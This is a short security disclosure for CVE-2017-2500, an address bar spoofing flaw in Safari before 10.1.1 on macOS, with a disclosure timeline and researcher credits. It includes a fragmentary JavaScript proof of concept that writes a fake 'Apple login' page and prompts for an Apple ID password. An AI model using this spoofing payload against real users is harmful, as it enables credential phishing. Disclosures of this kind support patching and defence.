September 14, 2018

[CVE-2017-2500]Address bar spoofing on macOS Safari

Affected Products

Safari <10.1.1 on macOS


When we visit an URL with a special port or an address which exists in DNS record but cannot access anymore(such as "" or ""),safari will try to connect this port,so during the loading time,spoofing will be occured!

The PoC

function spoof(){

document.write("<title>Apple login</title><h1>Trust me!This is!</h1>");

//or you can use the following script:

    prompt('Checking your appid password:');

Disclosure Timeline

2017/2/7 Provide vulnerability detail to APPLE via

2017/4/26 Apple fix it in Safari 10.1.1

2017/5/12 CVE-2017-2500 assigned.


This vulnerability was discovered by Zhiyang Zeng and Yuyang Zhou of Tencent Security Platform Department.